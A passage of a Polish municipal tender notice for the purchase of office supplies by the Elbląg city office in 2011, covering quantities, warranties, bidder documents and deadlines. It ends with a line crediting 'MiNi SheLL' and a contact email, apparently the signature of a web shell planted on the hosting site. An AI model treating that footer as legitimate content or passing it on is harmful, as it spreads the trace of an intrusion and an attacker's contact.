120. WKŁAD  do pióra żelowego  UNI-BALL SIGNO 0,5 - Uni UM-100 - czerwony - ilość razem 100, ilość w I etapie 50, ilość w II etapie 50
121. WORKI do niszczarki 160 l w szt. - ilość razem 80, ilość w I etapie 80, ilość w II etapie 0
122. WORKI do niszczarki 120 l w szt. - ilość razem 600, ilość w I etapie 300, ilość w II etapie 300
123.	ZAKREŚLACZ tekstu ze ściętą końcówką o szerokości 5 mm, do pisania na wszystkich rodzajach papieru, ZIELONY - ilość razem 250, ilość w I etapie 200, ilość w II etapie 50
124. ZAKREŚLACZ tekstu ze ściętą końcówką o szerokości 5 mm, do pisania na wszystkich rodzajach papieru, ŻÓŁTY - ilość razem 250, ilość w I etapie 200, ilość w II etapie 50
125. ZAKREŚLACZ tekstu ze ściętą końcówką o szerokości 5 mm, do pisania na wszystkich rodzajach papieru, POMARAŃCZOWY - ilość razem 80, ilość w I etapie 80, ilość w II etapie 0
126. ZESZYT A4 - 192 kartkowy w kratkę, twarda okładka - ilość razem 50, ilość w I etapie 50, ilość w II etapie 0
127. ZESZYT A4 - 96 kartkowy w kratkę, twarda okładka - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
128. ZESZYT B5 -P 160 kartkowy w kratkę, twarda okładka - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
129. ZESZYT A5 - 96 kartkowy w kratkę, twarda okładka - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
130.	ZSZYWACZ EAGLE GALAXY S6083B, metalowy wyposażony w obrotowy mechanizm umożliwiający zaginanie zszywek do wewnątrz i na zewnątrz, zszywa 25 kartek, na zszywki 24/6- ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
131. ZSZYWKI 24/6 - małe opakowania po 1000 szt. zszywek - ilość razem 1 300, ilość w I etapie 1 300, ilość w II etapie 0
132. ZSZYWKI 23/10 - małe opakowania po 1000 szt. zszywek - ilość razem 30, ilość w I etapie 30, ilość w II etapie 0
133. WORKI SANITARNE MOCNE 120 l, o wym. 70x110cm, gr. folii 30 mikronów, w  szt. - ilość razem 1 200, ilość w I etapie 1 200, ilość w II etapie 0
134. RĘKAWICE foliowe jednorazowe, rozmiar średni, z folii HDPE, w  szt. - ilość razem 6 000, ilość w I etapie 6 000, ilość w II etapie 0
135.	Niszczarka do papieru: - Poziom bezp. S2, szerokość cięcia 5,8mm; 11 kartek A4 jednorazowo; kosz 23 l, technologia kompaktowania ścinków, kosz mieści 25% więcej kartek, funkcja auto start/stop, zabezpieczenie przed przegrzaniem, funkcja cofania papieru, łatwy w opróżnianiu pojemnik; - Wydajność niszczenia: maksymalnie 110 kartek na minutę; -Ogranicznik ilości wkładanych kartek; - Tnie zszywki. Gwarancja: 24 miesiące. - ilość razem 4, ilość w I etapie 4, ilość w II etapie 0
136.	CLIPBOARD podkład z klipsem zamykany format A4 - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
137.	WIZYTOWNIK OBROTOWY na 400 wizytówek czarny. Posiada 200 przezroczystych, dwustronnych koszulek na wizytówki, rozmiar koszulki: 67x102 mm, zawiera 24 przekładki alfabetyczne (A-Z), otwarty, stabilna metalowa konstrukcja. - ilość razem 5, ilość w I etapie 5, ilość w II etapie 0

Miejsce dostawy: Urząd Miejski w Elblągu, 82-300 Elbląg, ul. Łączności 1.

2.	W pozycjach opisanych poprzez wskazania znaku towarowego patentu lub pochodzenia dopuszcza się składanie ofert równoważnych o parametrach technicznych i wymogach jakościowych nie niższych niż przedmioty wskazane przez Zamawiającego.

3.	W przypadku stwierdzenia przez Zamawiającego, iż jakość dostarczonych materiałów niekorzystnie odbiega od parametrów produktu opisanego przez Zamawiającego, Wykonawca zobowiązany będzie do nieodpłatnej wymiany wadliwych materiałów w ciągu 10 dni od dnia zawiadomienia przez Zamawiającego drogą telefoniczną, faksem lub pisemnie o zaistniałych wadach, na materiały wolne od wad.

4.	Dostarczone przez Wykonawcę materiały muszą być wyprodukowane nie wcześniej niż 6 miesięcy przed dostawą do Zamawiającego, muszą posiadać znak firmowy producenta, etykietę zawierającą numer katalogowy oraz termin ważności, a także nienaruszone cechy pierwotne opakowania (jeśli dotyczy).

5.	Oferta musi być kompletna w zakresie zamawianego towaru opisanego w Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu. Nieuwzględnienie chociażby jednej z zamawianych pozycji asortymentowych spowoduje odrzucenie oferty.

6.	Wykonawca zobowiązany jest do złożenia wraz z ofertą kolorowych kart katalogowych lub kolorowych wydruków z kart katalogowych umieszczonych na stronie internetowej przedstawiających przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów, potwierdzające, że oferowane przedmioty spełnią wymagania Zamawiającego dla przedmiotów wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok. oraz dla przedmiotów oferowanych jako równoważne do opisanych przez Zamawiającego. Kolorowe karty katalogowe lub kolorowe wydruki złożone wraz z ofertą muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ZAŁĄCZNIKA NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok.
7.	Wszystkie przedmioty zamówienia opisane w Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu, które mają określoną gramaturę papieru lub tektury muszą posiadać oznaczenie tej gramatury na poszczególnych przedmiotach zamówienia lub na zbiorowym opakowaniu.

8.	Dostarczone materiały muszą być fabrycznie nowe, w oryginalnych opakowaniach producenta.

9.	Zamawiający wymaga udzielenia następujących gwarancji:
- na kalkulatory i niszczarki 			- 24 miesiące od dnia dostawy
- na pozostałe przedmioty zamówienia każdego etapu dostawy 	- minimum 12 miesięcy od dnia dostawy

10.	Zamawiający informuje, że zgodnie z ustawą Prawo zamówień publicznych Wykonawca, który złoży ofertę zawierającą rozwiązania równoważne do opisanych przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego w SIWZ.
W związku z powyższym Zamawiający wymaga, aby Wykonawca w ZAŁĄCZNIKU NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok. w kolumnie Opis przedmiotu wskazał i opisał przedmiot, który oferuje Zamawiającemu jako równoważny do opisanego przez Zamawiającego w Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu.
Przez równoważne przedmioty Zamawiający rozumie przedmioty o parametrach technicznych takich samych bądź wyższych niż opisane przez Zamawiającego w Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu.

11.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.00.00-7, 30.12.40.00-4, 22.85.00.00-3, 22.80.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 dostaw materiałów biurowych o wartości min. 100 000,00 zł bez VAT każda.

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku tj. liczba wykonanych dostaw, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Natomiast sumowaniu nie podlega wartość dostaw, tj. każda wykazana dostawa musi mieć wartość minimum 100 000,00 zł bez VAT.

Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości dostaw należy przeliczyć wg średniego kursu NBP na dzień odbioru tych dostaw, podając datę i kurs.

Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.

2. Jako próbki, opisy lub fotografie, o których mowa w Sekcji III.5) ogłoszenia o zamówieniu, Zamawiający wymaga złożenia następujących dokumentów:
Kolorowych kart katalogowych lub kolorowych wydruków z kart katalogowych przedstawiających przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów, potwierdzających, że oferowane przedmioty spełniają wymagania Zamawiającego dla przedmiotów wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok. oraz dla przedmiotów oferowanych jako równoważne do opisanych przez Zamawiającego.
Uwaga:
a)	Kolorowe karty katalogowe lub kolorowe wydruki z kart katalogowych przedstawiające przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów muszą być złożone wraz z ofertą dla przedmiotów wyróżnionych zaciemnieniem w ZAŁĄCZNIKU NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok. oraz dla przedmiotów oferowanych jako równoważne do opisanych przez Zamawiającego .
b)	Kolorowe karty katalogowe lub kolorowe wydruki z kart katalogowych przedstawiające przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów muszą być oznaczone numerem odpowiadającym liczbie porządkowej pozycji asortymentu z ZAŁĄCZNIKA NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok..
c)	Dokumenty wymienione w Sekcji III.5)  pkt 2. ogłoszenia o zamówieniu muszą być w języku polskim.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

3.W przypadku zaoferowania przez Wykonawcę towarów równoważnych do opisanych przez Zamawiającego Wykonawca, w celu potwierdzenia, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego w SIWZ, musi wskazać i opisać przedmiot oferowany Zamawiającemu jako równoważny do opisanego przez Zamawiającego w Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu. Opisy tych towarów należy umieścić w kolumnie Opis przedmiotu ZAŁĄCZNIKA NR 4 do SIWZ Szczegółowy opis, zakres i wycena przedmiotu zamówienia - materiały biurowe na 2011 rok. i muszą one odpowiadać liczbie porządkowej pozycji towarów z Sekcji II.1.3) pkt 1. ogłoszenia o zamówieniu.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.   Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
data rozpoczęcia:  data udzielenia zamówienia
data zakończenia: 9 września 2011 r.
w tym:
I etap dostawy   - do 14 dni od daty udzielenia zamówienia
II etap dostawy  - do 9 września 2011 r.

2. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).

3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:
a)	Dla dostaw wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te dostawy zostały wykonane należycie.
b)	Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości dostaw należy przeliczyć wg średniego kursu NBP na dzień odbioru tych dostaw, podając datę i kurs.
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.3.2) ogłoszenia o zamówieniu.
d)	Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

4. Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
a)	Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

5. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
a)  Treść wymaganego Oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych składanego przez osoby fizyczne Zamawiający przekazuje na ZAŁĄCZNIKU NR 2c do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument wymieniony w pkt VI.A. ppkt 2. SIWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

6. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty zawierajace oświadczenia, że:
-	nie otwarto likwidacji Wykonawcy ani nie ogłoszono upadłości,
-	nie orzeczono wobec Wykonawcy zakazu ubiegania się o zamówienie,
powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Dokument zawierający oświadczenie, że:
-    Wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
 powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

7.  Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

8. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com